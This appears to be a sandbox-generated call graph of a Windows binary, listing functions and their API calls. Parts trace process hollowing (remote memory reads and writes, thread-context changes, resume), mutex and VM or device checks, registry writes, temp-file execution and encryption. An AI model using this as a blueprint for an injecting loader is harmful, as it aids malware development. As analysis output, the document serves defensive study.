21233->21234 21235 42aed6 21234->21235 21238 4262ee 21235->21238 21247 42c113 RtlDecodePointer 21238->21247 21240 4262f3 21241 4262fe 21240->21241 21248 42c120 21240->21248 21245 426316 21241->21245 21269 424feb 21241->21269 21244 424630 __amsg_exit 66 API calls 21246 426320 21244->21246 21245->21244 21247->21240 21249 42c12c FindHandler 21248->21249 21250 42c153 21249->21250 21251 42c187 21249->21251 21254 42c169 RtlDecodePointer 21249->21254 21257 42c14f 21249->21257 21253 425e72 __getptd 66 API calls 21250->21253 21251->21254 21255 42c196 21251->21255 21258 42c158 _siglookup 21253->21258 21254->21258 
21256 4251b8 __cftof2_l 66 API calls 21255->21256 21259 42c19b 21256->21259 21257->21250 21257->21255 21260 424630 __amsg_exit 66 API calls 21258->21260 21261 42c1f3 21258->21261 21268 42c161 FindHandler 21258->21268 21262 425166 __cftof2_l 11 API calls 21259->21262 21260->21261 21263 42c08b ___crtLCMapStringA 66 API calls 21261->21263 21264 42c1fe 21261->21264 21262->21268 21263->21264 21266 42c233 21264->21266 21275 425cfe RtlEncodePointer 21264->21275 21276 42c287 21266->21276 21268->21241 21270 42500a __cftof2_l __87except 21269->21270 21271 425028 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21270->21271 21274 4250f6 __87except 21271->21274 21272 429814 __87except 5 API calls 21273 425112 21272->21273 21273->21245 21274->21272 21275->21266 21277 42c28d 21276->21277 21279 42c294 21276->21279 21280 42bfb2 RtlLeaveCriticalSection 21277->21280 21279->21268 21280->21279 21355 407f1c 21357 407f20 21355->21357 21356 40804e 21357->21356 21359 407e28 21357->21359 21360 407e49 21359->21360 21361 407e6d 21359->21361 21363 407eed 21360->21363 21364 407e5a 21360->21364 21374 407e68 21360->21374 21362 407e7f lstrcmpi 21361->21362 21361->21374 21365 407eac 21362->21365 21370 407e93 21362->21370 21373 407474 27 API calls 21363->21373 21366 407e61 21364->21366 21367 407eb8 21364->21367 21392 407240 21365->21392 21372 407474 27 API calls 21366->21372 21366->21374 21398 407d3c GetTempPathA 21367->21398 21375 407474 21370->21375 21372->21374 21373->21374 21374->21357 21376 407493 21375->21376 21410 4072c4 21376->21410 21379 405894 6 API calls 21380 4074be 21379->21380 21414 4013dc GetProcessHeap RtlAllocateHeap 21380->21414 21382 4074c6 21383 405894 6 API calls 21382->21383 21384 4074e6 21383->21384 21385 4074ef RegCreateKeyExA 21384->21385 21386 407515 RegCreateKeyExA 21384->21386 21387 407539 21385->21387 21386->21387 21415 403930 RegSetValueExA 21387->21415 21389 407550 21416 403890 RegCloseKey 21389->21416 21391 40755b 21391->21374 21393 407259 
21392->21393 21417 4071d4 21393->21417 21396 407271 21396->21374 21399 407d6e 21398->21399 21400 407e18 21399->21400 21531 403c28 21399->21531 21400->21374 21402 407db5 21403 407db9 ShellExecuteA 21402->21403 21404 407e1a 21402->21404 21403->21400 21405 407dd9 21403->21405 21406 407240 26 API calls 21404->21406 21538 401864 wsprintfA 21405->21538 21406->21400 21408 407de6 21409 407240 26 API calls 21408->21409 21409->21400 21411 4072dc 21410->21411 21412 406eec 17 API calls 21411->21412 21413 4072fd 21412->21413 21413->21379 21414->21382 21415->21389 21416->21391 21418 4071f1 21417->21418 21419 407231 21417->21419 21424 4064bc 21418->21424 21419->21396 21423 401440 GetProcessHeap HeapFree 21419->21423 21421 4071fc 21437 405d20 21421->21437 21423->21396 21425 4064d8 21424->21425 21426 40651f GetVersionExA 21425->21426 21505 401864 wsprintfA 21426->21505 21428 406549 21506 401864 wsprintfA 21428->21506 21430 406572 21507 401864 wsprintfA 21430->21507 21432 406593 21508 403ea0 21432->21508 21436 4065f2 21436->21421 21438 405d38 21437->21438 21470 406102 21437->21470 21439 4054b8 wsprintfA 21438->21439 21438->21470 21440 405dde 21439->21440 21441 405858 3 API calls 21440->21441 21442 405dee 21441->21442 21443 405858 3 API calls 21442->21443 21444 405dfe 21443->21444 21445 4017e8 CryptAcquireContextA 21444->21445 21446 405e5f 21445->21446 21447 4018a0 CryptImportKey 21446->21447 21448 405e77 21447->21448 21449 401ab0 CryptEncrypt 21448->21449 21450 405e9d 21449->21450 21451 401af8 CryptDestroyKey 21450->21451 21452 405ea5 21451->21452 21453 401b20 CryptReleaseContext 21452->21453 21456 405eaf 21453->21456 21454 4060b0 21521 4013dc GetProcessHeap RtlAllocateHeap 21454->21521 21455 406056 21457 405894 6 API calls 21455->21457 21456->21454 21456->21455 21459 40606d 21457->21459 21520 4013dc GetProcessHeap RtlAllocateHeap 21459->21520 21460 4060ae 21464 4060fa 21460->21464 21465 406107 21460->21465 21462 40607a 21463 405894 6 API calls 21462->21463 21463->21460 21522 401440 
GetProcessHeap HeapFree 21464->21522 21523 401440 GetProcessHeap HeapFree 21465->21523 21468 40610f 21468->21470 21524 4013dc GetProcessHeap RtlAllocateHeap 21468->21524 21470->21419 21471 40614f 21471->21470 21472 4061c5 21471->21472 21525 401460 GetProcessHeap RtlReAllocateHeap 21471->21525 21473 4061d8 21472->21473 21474 4061cb 21472->21474 21527 4013dc GetProcessHeap RtlAllocateHeap 21473->21527 21526 401440 GetProcessHeap HeapFree 21474->21526 21478 4061e1 21479 4059bc 6 API calls 21478->21479 21480 40620f 21479->21480 21481 4017e8 CryptAcquireContextA 21480->21481 21482 406222 21481->21482 21483 401374 CryptCreateHash 21482->21483 21484 406237 21483->21484 21485 401404 CryptHashData 21484->21485 21486 40624c 21485->21486 21487 401404 CryptHashData 21486->21487 21488 406261 21487->21488 21489 401404 CryptHashData 21488->21489 21490 40627e 21489->21490 21491 401404 CryptHashData 21490->21491 21492 406292 21491->21492 21493 401490 CryptGetHashParam 21492->21493 21494 4062b2 21493->21494 21495 4014d0 CryptDestroyHash 21494->21495 21496 4062ba 21495->21496 21497 401b20 CryptReleaseContext 21496->21497 21498 4062c4 21497->21498 21499 4062db 21498->21499 21500 4062fd 21498->21500 21528 401440 GetProcessHeap HeapFree 21499->21528 21530 401440 GetProcessHeap HeapFree 21500->21530 21503 4062e3 21529 401440 GetProcessHeap HeapFree 21503->21529 21505->21428 21506->21430 21507->21432 21509 403eaf RegCreateKeyExA 21508->21509 21510 403ed5 RegCreateKeyExA 21508->21510 21511 403ef9 21509->21511 21510->21511 21518 4038b0 RegQueryValueExA 21511->21518 21513 403f16 21519 403890 RegCloseKey 21513->21519 21515 403f2f 21516 405468 GetSystemTime 21515->21516 21517 405480 21516->21517 21517->21436 21518->21513 21519->21515 21520->21462 21521->21460 21522->21470 21523->21468 21524->21471 21525->21471 21526->21470 21527->21478 21528->21503 21529->21470 21530->21470 21532 403c45 21531->21532 21535 403c4a 21531->21535 21539 403a04 21532->21539 21534 403e78 21534->21402 21535->21534 
21536 403e40 WriteFile 21535->21536 21537 403e67 CloseHandle 21535->21537 21536->21535 21537->21534 21538->21408 21558 40395c RegOpenKeyA 21539->21558 21541 403a27 21559 4038b0 RegQueryValueExA 21541->21559 21543 403a43 21560 403890 RegCloseKey 21543->21560 21545 403a4e 21561 40395c RegOpenKeyA 21545->21561 21547 403a8e 21562 4038b0 RegQueryValueExA 21547->21562 21549 403aac 21563 403890 RegCloseKey 21549->21563 21551 403ab7 21564 40395c RegOpenKeyA 21551->21564 21553 403ade 21555 403b49 21553->21555 21565 4038fc RegEnumValueA 21553->21565 21566 403890 RegCloseKey 21555->21566 21557 403b63 21557->21535 21558->21541 21559->21543 21560->21545 21561->21547 21562->21549 21563->21551 21564->21553 21565->21553 21566->21557 19545 409230 19558 406eec 19545->19558 19581 406ece 19545->19581 19546 409232 19547 409254 Sleep 19546->19547 19548 409268 19546->19548 19547->19548 19611 406e04 GetModuleFileNameA CharUpperBuffA 19548->19611 19551 4092bb 19552 4092b3 19554 4069bc 10 API calls 19552->19554 19553 409285 OpenMutexA 19553->19552 19555 4092a1 CloseHandle ExitProcess 19553->19555 19554->19551 19559 403f38 2 API calls 19558->19559 19560 406f04 LoadLibraryA 19559->19560 19624 401440 GetProcessHeap HeapFree 19560->19624 19562 406f1c 19563 4070c7 19562->19563 19625 401994 19562->19625 19563->19546 19566 401994 2 API calls 19567 406f45 19566->19567 19568 401994 2 API calls 19567->19568 19569 406f57 19568->19569 19570 401994 2 API calls 19569->19570 19571 406f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 19570->19571 19631 4012dc 19571->19631 19574 403f38 2 API calls 19575 407001 19574->19575 19576 40701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 19575->19576 19577 4012dc 19576->19577 19578 40708e CharLowerBuffA SetupDiDestroyDeviceInfoList 19577->19578 19579 4070b4 19578->19579 19633 401440 GetProcessHeap HeapFree 19579->19633 19582 406f21 19581->19582 19583 406ed3 19581->19583 19584 406f33 19582->19584 19585 
401994 2 API calls 19582->19585 19586 406ea4 19583->19586 19588 406ed5 19583->19588 19587 401994 2 API calls 19584->19587 19585->19584 19638 401440 GetProcessHeap HeapFree 19586->19638 19589 406f45 19587->19589 19590 403f38 2 API calls 19588->19590 19592 401994 2 API calls 19589->19592 19593 406f04 LoadLibraryA 19590->19593 19595 406f57 19592->19595 19637 401440 GetProcessHeap HeapFree 19593->19637 19594 406ec7 19594->19546 19597 401994 2 API calls 19595->19597 19598 406f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 19597->19598 19601 4012dc 19598->19601 19599 406f1c 19600 4070c7 19599->19600 19602 401994 2 API calls 19599->19602 19600->19546 19603 406fdf CharLowerBuffA SetupDiDestroyDeviceInfoList 19601->19603 19602->19584 19604 403f38 2 API calls 19603->19604 19605 407001 19604->19605 19606 40701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 19605->19606 19607 4012dc 19606->19607 19608 40708e CharLowerBuffA SetupDiDestroyDeviceInfoList 19607->19608 19609 4070b4 19608->19609 19639 401440 GetProcessHeap HeapFree 19609->19639 19612 403f38 2 API calls 19611->19612 19613 406e47 19612->19613 19640 401440 GetProcessHeap HeapFree 19613->19640 19615 406e6b 19616 403f38 2 API calls 19615->19616 19617 406e75 19616->19617 19641 401440 GetProcessHeap HeapFree 19617->19641 19619 406e99 19620 403f38 2 API calls 19619->19620 19621 406ea3 19620->19621 19642 401440 GetProcessHeap HeapFree 19621->19642 19623 406ec7 19623->19551 19623->19552 19623->19553 19624->19562 19626 4019e8 19625->19626 19627 4019b4 19625->19627 19626->19566 19627->19626 19628 401a62 19627->19628 19634 401928 19628->19634 19630 401a6b 19630->19626 19632 4012f0 CharLowerBuffA SetupDiDestroyDeviceInfoList 19631->19632 19632->19574 19633->19563 19635 40193c 19634->19635 19636 401961 LoadLibraryA GetProcAddress 19635->19636 19636->19630 19637->19599 19638->19594 19639->19600 19640->19615 19641->19619 19642->19623 18280 4092cd 18282 4092cf 
GetModuleFileNameA 18280->18282 18287 407c50 18282->18287 18290 407c77 18287->18290 18288 407ca2 ReadFile SetFilePointer ReadFile CloseHandle 18289 407cf3 wsprintfA GetCursorPos 18288->18289 18291 4069bc 18289->18291 18290->18288 18290->18289 18299 406904 GetComputerNameA 18291->18299 18293 4069d5 GetTempPathA 18294 4069fa 18293->18294 18306 4047ac 18294->18306 18297 406a2f 18300 40694f RegOpenKeyExA 18299->18300 18302 406931 18299->18302 18314 4038b0 RegQueryValueExA 18300->18314 18302->18300 18303 406992 18315 403890 RegCloseKey 18303->18315 18305 40699d 18305->18293 18307 4047df 18306->18307 18308 40480a GetFileSize 18307->18308 18309 404855 18307->18309 18308->18309 18310 40481f 18308->18310 18309->18297 18313 401828 VirtualFree 18309->18313 18316 4013b4 VirtualAlloc 18310->18316 18312 40482b ReadFile CloseHandle 18312->18309 18313->18297 18314->18303 18315->18305 18316->18312 23623 1821652 23624 18215db 23623->23624 23628 182164c 23623->23628 23625 1821609 23624->23625 23626 1820000 39 API calls 23624->23626 23629 18256f4 35 API calls 23625->23629 23630 1823124 35 API calls 23625->23630 23626->23625 23627 182164d 23629->23627 23630->23627 23821 406cfc 23822 403f38 2 API calls 23821->23822 23823 406d0c 23822->23823 23826 401440 GetProcessHeap HeapFree 23823->23826 23825 406d36 23826->23825 23848 406cf0 23849 406cfc 23848->23849 23850 403f38 2 API calls 23849->23850 23851 406d0c 23850->23851 23854 401440 GetProcessHeap HeapFree 23851->23854 23853 406d36 23854->23853 22028 408977 22031 401440 GetProcessHeap HeapFree 22028->22031 22030 40897f 22031->22030 18668 432e20 18669 4249b3 76 API calls 18668->18669 18670 432e2a 18669->18670 22463 403f36 22464 403f38 22463->22464 22467 4013dc GetProcessHeap RtlAllocateHeap 22464->22467 22466 403f6c 22467->22466 18788 409178 18790 40917a 18788->18790 18794 403b6c GetCommandLineA 18790->18794 18791 40918f 18792 4069bc 10 API calls 18791->18792 18793 40919a 18792->18793 18794->18791 19440 409347 19458 406bf0 19440->19458 19445 
409391 GetWindowsDirectoryA 19447 40938c 19445->19447 19446 409368 GetWindowsDirectoryA 19446->19447 19468 405028 19447->19468 19450 409459 ExitProcess 19451 4093f9 SHGetSpecialFolderPathA 19493 40133c 19451->19493 19453 40941e PathFileExistsA 19453->19450 19454 409432 19453->19454 19455 405028 28 API calls 19454->19455 19456 409453 19455->19456 19456->19450 19495 406b60 19458->19495 19460 406bfe GetCurrentProcess 19461 40453c 19460->19461 19462 404555 GetCurrentProcess 19461->19462 19463 40454f 19461->19463 19464 40455e 19462->19464 19463->19462 19463->19464 19465 404567 IsWow64Process 19464->19465 19466 404585 19464->19466 19465->19466 19467 404579 19465->19467 19466->19445 19466->19446 19467->19466 19469 40503e GetModuleHandleA 19468->19469 19471 405049 19468->19471 19469->19471 19470 40506e CreateProcessA 19472 4052ce 19470->19472 19473 4050a3 19470->19473 19471->19470 19472->19450 19472->19451 19474 4050c4 CreateFileMappingA MapViewOfFile 19473->19474 19475 405124 19474->19475 19499 4013b4 VirtualAlloc 19475->19499 19477 405169 19500 404ef0 19477->19500 19479 4051db 19483 4051f4 GetThreadContext 19479->19483 19488 405213 19479->19488 19480 40522b 19516 404de0 19480->19516 19481 405236 19481->19472 19482 405240 VirtualProtectEx WriteProcessMemory 19481->19482 19515 401828 VirtualFree 19482->19515 19483->19488 19487 40527a ResumeThread 19489 40528a WaitForSingleObject 19487->19489 19491 4052ac 19487->19491 19488->19480 19488->19481 19490 40529c GetExitCodeProcess 19489->19490 19489->19491 19492 4052ba CloseHandle CloseHandle 19490->19492 19491->19492 19492->19472 19494 401345 19493->19494 19494->19453 19496 406b78 19495->19496 19497 406b8b Sleep 19496->19497 19497->19496 19498 406b9f 19497->19498 19498->19460 19499->19477 19522 4013dc GetProcessHeap RtlAllocateHeap 19500->19522 19502 404f0d 19523 404e94 NtQueryInformationProcess 19502->19523 19505 404f25 ReadProcessMemory 19506 405011 19505->19506 19507 404f4e ReadProcessMemory 19505->19507 19527 401440 
GetProcessHeap HeapFree 19506->19527 19507->19506 19510 404f7d 19507->19510 19509 405019 19509->19479 19510->19506 19511 404fa5 ReadProcessMemory 19510->19511 19511->19506 19512 404fcc 19511->19512 19512->19506 19513 404fd8 ReadProcessMemory 19512->19513 19513->19506 19514 404ffd 19513->19514 19514->19506 19515->19487 19528 401258 19516->19528 19518 404dfb NtQueryInformationProcess 19519 404e8d 19518->19519 19520 404e18 19518->19520 19519->19481 19520->19519 19521 404e1e ReadProcessMemory ReadProcessMemory ReadProcessMemory 19520->19521 19521->19519 19522->19502 19524 404ebc 19523->19524 19525 404ee9 19523->19525 19524->19525 19526 404ec2 ReadProcessMemory 19524->19526 19525->19505 19525->19506 19526->19525 19527->19509 19528->19518 24396 406d55 24397 406d64 24396->24397 24398 403f38 2 API calls 24397->24398 24399 406d79 GetModuleHandleA 24398->24399 24402 401440 GetProcessHeap HeapFree 24399->24402 24401 406d9a 24402->24401 19985 42ca48 SetUnhandledExceptionFilter 22636 4041c8 22637 4041cc GetCurrentThread OpenThreadToken 22636->22637 22638 4041f4 GetLastError 22637->22638 22639 404217 22637->22639 22638->22639 22641 404201 GetCurrentProcess OpenProcessToken 22638->22641 22640 4042cc 22639->22640 22651 4013dc GetProcessHeap RtlAllocateHeap 22639->22651 22641->22639 22643 40422b GetTokenInformation CloseHandle 22644 40425a AllocateAndInitializeSid 22643->22644 22645 4042c4 22643->22645 22646 4042ba FreeSid 22644->22646 22649 404288 22644->22649 22652 401440 GetProcessHeap HeapFree 22645->22652 22646->22645 22648 404293 EqualSid 22648->22649 22650 4042ac 22648->22650 22649->22646 22649->22648 22650->22646 22651->22643 22652->22640 18317 432dda 18318 432de4 18317->18318 18321 4249b3 18318->18321 18324 424977 18321->18324 18323 4249c0 18325 424983 FindHandler 18324->18325 18332 4243da 18325->18332 18331 4249a4 FindHandler 18331->18323 18351 42c08b 18332->18351 18334 4243e1 18335 424890 RtlDecodePointer RtlDecodePointer 18334->18335 18336 42493f 18335->18336 18337 
4248be 18335->18337 18348 4249ad 18336->18348 18337->18336 18631 4252ae 18337->18631 18339 4248d0 18340 424922 RtlEncodePointer RtlEncodePointer 18339->18340 18341 4248eb 18339->18341 18342 4248fa 18339->18342 18340->18336 18638 42a170 18341->18638 18342->18336 18344 4248f4 18342->18344 18344->18342 18345 42a170 70 API calls 18344->18345 18347 424910 RtlEncodePointer 18344->18347 18346 42490a 18345->18346 18346->18336 18346->18347 18347->18340 18664 4243e3 18348->18664 18352 42c0a0 18351->18352 18353 42c0b3 RtlEnterCriticalSection 18351->18353 18358 42bfc9 18352->18358 18353->18334 18355 42c0a6 18355->18353 18383 424664 18355->18383 18359 42bfd5 FindHandler 18358->18359 18360 42bffb 18359->18360 18390 426517 18359->18390 18368 42c00b FindHandler 18360->18368 18426 42a0df 18360->18426 18366 42c02c 18371 42c08b ___crtLCMapStringA 65 API calls 18366->18371 18367 42c01d 18432 4251b8 18367->18432 18368->18355 18373 42c033 18371->18373 18374 42c066 18373->18374 18375 42c03b InitializeCriticalSectionAndSpinCount 18373->18375 18376 422804 std::exception::_Tidy 65 API calls 18374->18376 18377 42c04b 18375->18377 18378 42c057 18375->18378 18376->18378 18435 422804 18377->18435 18441 42c082 18378->18441 18381 42c051 18382 4251b8 __cftof2_l 65 API calls 18381->18382 18382->18378 18384 426517 __amsg_exit 66 API calls 18383->18384 18385 42466e 18384->18385 18386 426368 __amsg_exit 66 API calls 18385->18386 18387 424676 18386->18387 18598 424630 18387->18598 18444 42e66a 18390->18444 18392 42651e 18393 42652b 18392->18393 18394 42e66a __amsg_exit 66 API calls 18392->18394 18395 426368 __amsg_exit 66 API calls 18393->18395 18398 42654d 18393->18398 18394->18393 18396 426543 18395->18396 18397 426368 __amsg_exit 66 API calls 18396->18397 18397->18398 18399 426368 18398->18399 18400 426389 __amsg_exit 18399->18400 18401 4264a5 18400->18401 18402 42e66a __amsg_exit 63 API calls 18400->18402 18499 429814 18401->18499 18405 4263a3 18402->18405 18404 426515 18423 4243c2 18404->18423 
18406 4264b4 GetStdHandle 18405->18406 18407 42e66a __amsg_exit 63 API calls 18405->18407 18406->18401 18410 4264c2 _strlen 18406->18410 18409 4263b4 18407->18409 18408 4263c6 18408->18401 18463 42e607 18408->18463 18409->18406 18409->18408 18410->18401 18413 4264f8 WriteFile 18410->18413 18413->18401 18414 4263f2 GetModuleFileNameW 18415 426413 18414->18415 18418 42641f _wcslen 18414->18418 18416 42e607 __amsg_exit 63 API calls 18415->18416 18416->18418 18417 425114 __fltout2 10 API calls 18417->18418 18418->18417 18420 42e577 63 API calls __amsg_exit 18418->18420 18421 426495 18418->18421 18472 422b0b 18418->18472 18420->18418 18481 42e40b 18421->18481 18509 424397 GetModuleHandleW 18423->18509 18428 42a0e8 18426->18428 18429 42a11e 18428->18429 18430 42a0ff Sleep 18428->18430 18512 422a18 18428->18512 18429->18366 18429->18367 18431 42a114 18430->18431 18431->18428 18431->18429 18531 425e72 GetLastError 18432->18531 18434 4251bd 18434->18368 18436 42280f RtlFreeHeap 18435->18436 18437 422838 std::exception::_Tidy 18435->18437 18436->18437 18438 422824 18436->18438 18437->18381 18439 4251b8 __cftof2_l 64 API calls 18438->18439 18440 42282a GetLastError 18439->18440 18440->18437 18597 42bfb2 RtlLeaveCriticalSection 18441->18597 18443 42c089 18443->18368 18445 42e676 18444->18445 18446 42e680 18445->18446 18447 4251b8 __cftof2_l 66 API calls 18445->18447 18446->18392 18448 42e699 18447->18448 18451 425166 18448->18451 18454 425139 RtlDecodePointer 18451->18454 18455 42514e 18454->18455 18460 425114 18455->18460 18457 425165 18458 425139 __cftof2_l 10 API calls 18457->18458 18459 425172 18458->18459 18459->18392 18461 424feb __fltout2 8 API calls 18460->18461 18462 425126 GetCurrentProcess TerminateProcess 18461->18462 18462->18457 18464 42e61c 18463->18464 18465 42e615 18463->18465 18466 4251b8 __cftof2_l 66 API calls 18464->18466 18465->18464 18467 42e63d 18465->18467 18471 42e621 18466->18471 18469 4263e7 18467->18469 18470 4251b8 __cftof2_l 66 API calls 
18467->18470 18468 425166 __cftof2_l 11 API calls 18468->18469 18469->18414 18469->18418 18470->18471 18471->18468 18476 422b1d 18472->18476 18473 422b21 18474 4251b8 __cftof2_l 66 API calls 18473->18474 18478 422b26 18473->18478 18475 422b3d 18474->18475 18477 425166 __cftof2_l 11 API calls 18475->18477 18476->18473 18476->18478 18479 422b64 18476->18479 18477->18478 18478->18418 18479->18478 18480 4251b8 __cftof2_l 66 API calls 18479->18480 18480->18475 18507 425cfe RtlEncodePointer 18481->18507 18483 42e431 18484 42e4be 18483->18484 18485 42e441 LoadLibraryW 18483->18485 18487 42e4d8 RtlDecodePointer RtlDecodePointer 18484->18487 18498 42e4eb 18484->18498 18486 42e456 GetProcAddress 18485->18486 18495 42e556 18485->18495 18488 42e46c 7 API calls 18486->18488 18486->18495 18487->18498 18488->18484 18491 42e4ae GetProcAddress RtlEncodePointer 18488->18491 18489 42e54a RtlDecodePointer 18489->18495 18490 42e521 RtlDecodePointer 18490->18489 18493 42e528 18490->18493 18491->18484 18492 429814 __87except 5 API calls 18494 42e575 18492->18494 18493->18489 18496 42e53b RtlDecodePointer 18493->18496 18494->18401 18495->18492 18496->18489 18497 42e50e 18496->18497 18497->18489 18498->18489 18498->18490 18498->18497 18500 42981e IsDebuggerPresent 18499->18500 18501 42981c 18499->18501 18508 42df25 18500->18508 18501->18404 18504 42fb08 SetUnhandledExceptionFilter UnhandledExceptionFilter 18505 42fb2d GetCurrentProcess TerminateProcess 18504->18505 18506 42fb25 __87except 18504->18506 18505->18404 18506->18505 18507->18483 18508->18504 18510 4243bb ExitProcess 18509->18510 18511 4243ab GetProcAddress 18509->18511 18511->18510 18513 422a95 18512->18513 18514 422a26 18512->18514 18515 427a95 __getbuf RtlDecodePointer 18513->18515 18517 422a31 18514->18517 18520 422a54 RtlAllocateHeap 18514->18520 18523 422a81 18514->18523 18527 422a7f 18514->18527 18529 427a95 RtlDecodePointer 18514->18529 18516 422a9b 18515->18516 18518 4251b8 __cftof2_l 65 API calls 18516->18518 
18517->18514 18519 426517 __amsg_exit 65 API calls 18517->18519 18522 426368 __amsg_exit 65 API calls 18517->18522 18526 4243c2 __amsg_exit 3 API calls 18517->18526 18521 422a8d 18518->18521 18519->18517 18520->18514 18520->18521 18521->18428 18522->18517 18525 4251b8 __cftof2_l 65 API calls 18523->18525 18525->18527 18526->18517 18528 4251b8 __cftof2_l 65 API calls 18527->18528 18528->18521 18530 427aaa 18529->18530 18530->18514 18545 425d30 TlsGetValue 18531->18545 18533 425edf SetLastError 18533->18434 18537 425ea5 RtlDecodePointer 18538 425eba 18537->18538 18539 425ebe 18538->18539 18540 425ed6 18538->18540 18554 425dbe 18539->18554 18541 422804 std::exception::_Tidy 62 API calls 18540->18541 18543 425edc 18541->18543 18543->18533 18544 425ec6 GetCurrentThreadId 18544->18533 18546 425d45 RtlDecodePointer TlsSetValue 18545->18546 18547 425d60 18545->18547 18546->18547 18547->18533 18548 42a124 18547->18548 18550 42a12d 18548->18550 18551 425e9d 18550->18551 18552 42a14b Sleep 18550->18552 18567 42afac 18550->18567 18551->18533 18551->18537 18553 42a160 18552->18553 18553->18550 18553->18551 18576 429ef0 18554->18576 18556 425dca GetModuleHandleW 18557 42c08b ___crtLCMapStringA 64 API calls 18556->18557 18558 425e08 InterlockedIncrement 18557->18558 18577 425e60 18558->18577 18561 42c08b ___crtLCMapStringA 64 API calls 18562 425e29 18561->18562 18580 4259c5 InterlockedIncrement 18562->18580 18564 425e47 18592 425e69 18564->18592 18566 425e54 FindHandler 18566->18544 18568 42afb8 18567->18568 18571 42afd3 18567->18571 18569 42afc4 18568->18569 18568->18571 18572 4251b8 __cftof2_l 65 API calls 18569->18572 18570 42afe6 RtlAllocateHeap 18570->18571 18575 42b00d 18570->18575 18571->18570 18574 427a95 __getbuf RtlDecodePointer 18571->18574 18571->18575 18573 42afc9 18572->18573 18573->18550 18574->18571 18575->18550 18576->18556 18595 42bfb2 RtlLeaveCriticalSection 18577->18595 18579 425e22 18579->18561 18581 4259e6 18580->18581 18582 4259e3 InterlockedIncrement 
18580->18582 18583 4259f3 18581->18583 18584 4259f0 InterlockedIncrement 18581->18584 18582->18581 18585 4259fd InterlockedIncrement 18583->18585 18586 425a00 18583->18586 18584->18583 18585->18586 18587 425a0a InterlockedIncrement 18586->18587 18588 425a0d 18586->18588 18587->18588 18589 425a26 InterlockedIncrement 18588->18589 18590 425a41 InterlockedIncrement 18588->18590 18591 425a36 InterlockedIncrement 18588->18591 18589->18588 18590->18564 18591->18588 18596 42bfb2 RtlLeaveCriticalSection 18592->18596 18594 425e70 18594->18566 18595->18579 18596->18594 18597->18443 18601 4244da 18598->18601 18600 424641 18602 4244e6 FindHandler 18601->18602 18603 42c08b ___crtLCMapStringA 61 API calls 18602->18603 18604 4244ed 18603->18604 18606 424518 RtlDecodePointer 18604->18606 18611 424597 18604->18611 18608 42452f RtlDecodePointer 18606->18608 18606->18611 18620 424542 18608->18620 18609 424614 FindHandler 18609->18600 18624 424605 18611->18624 18612 4245fc 18614 4243c2 __amsg_exit 3 API calls 18612->18614 18615 424605 18614->18615 18616 424612 18615->18616 18629 42bfb2 RtlLeaveCriticalSection 18615->18629 18616->18600 18617 424559 RtlDecodePointer 18623 425cfe RtlEncodePointer 18617->18623 18620->18611 18620->18617 18621 424568 RtlDecodePointer RtlDecodePointer 18620->18621 18622 425cfe RtlEncodePointer 18620->18622 18621->18620 18622->18620 18623->18620 18625 4245e5 18624->18625 18626 42460b 18624->18626 18625->18609 18628 42bfb2 RtlLeaveCriticalSection 18625->18628 18630 42bfb2 RtlLeaveCriticalSection 18626->18630 18628->18612 18629->18616 18630->18625 18632 4252b9 18631->18632 18633 4252ce RtlSizeHeap 18631->18633 18634 4251b8 __cftof2_l 66 API calls 18632->18634 18633->18339 18635 4252be 18634->18635 18636 425166 __cftof2_l 11 API calls 18635->18636 18637 4252c9 18636->18637 18637->18339 18640 42a179 18638->18640 18641 42a1b8 18640->18641 18642 42a199 Sleep 18640->18642 18643 425201 18640->18643 18641->18344 18642->18640 18644 42520c 18643->18644 18645 425217 
18643->18645 18648 422a18 __getbuf 66 API calls 18644->18648 18646 42521f 18645->18646 18647 42522c 18645->18647 18649 422804 std::exception::_Tidy 66 API calls 18646->18649 18651 425264 18647->18651 18653 425234 RtlReAllocateHeap 18647->18653 18656 425294 18647->18656 18657 427a95 __getbuf RtlDecodePointer 18647->18657 18660 42527c 18647->18660 18650 425214 18648->18650 18661 425227 std::exception::_Tidy 18649->18661 18650->18640 18652 427a95 __getbuf RtlDecodePointer 18651->18652 18654 42526a 18652->18654 18653->18647 18653->18661 18655 4251b8 __cftof2_l 66 API calls 18654->18655 18655->18661 18658 4251b8 __cftof2_l 66 API calls 18656->18658 18657->18647 18659 425299 GetLastError 18658->18659 18659->18661 18662 4251b8 __cftof2_l 66 API calls 18660->18662 18661->18640 18663 425281 GetLastError 18662->18663 18663->18661 18667 42bfb2 RtlLeaveCriticalSection 18664->18667 18666 4243ea 18666->18331 18667->18666 24433 406d64 24434 403f38 2 API calls 24433->24434 24435 406d79 GetModuleHandleA 24434->24435 24438 401440 GetProcessHeap HeapFree 24435->24438 24437 406d9a 24438->24437 18807 424946 18808 42a124 __getptd 66 API calls 18807->18808 18809 424952 RtlEncodePointer 18808->18809 18810 42496b 18809->18810 19981 409147 19982 409149 19981->19982 19983 4069bc 10 API calls 19982->19983 19984 409166 19983->19984 22696 403e98 22697 403eaf RegCreateKeyExA 22696->22697 22698 403ed5 RegCreateKeyExA 22696->22698 22699 403ef9 22697->22699 22698->22699 22704 4038b0 RegQueryValueExA 22699->22704 22701 403f16 22705 403890 RegCloseKey 22701->22705 22703 403f2f 22704->22701 22705->22703 18795 424d6e 18799 42d0c2 18795->18799 18797 424d73 18798 42d0c2 5 API calls 18797->18798 18798->18797 18800 42d0f4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount RtlQueryPerformanceCounter 18799->18800 18801 42d0e7 18799->18801 18802 42d0eb 18800->18802 18801->18800 18801->18802 18802->18797 19986 432da2 19987 432dba 19986->19987 19988 4249b3 76 API calls 19987->19988 
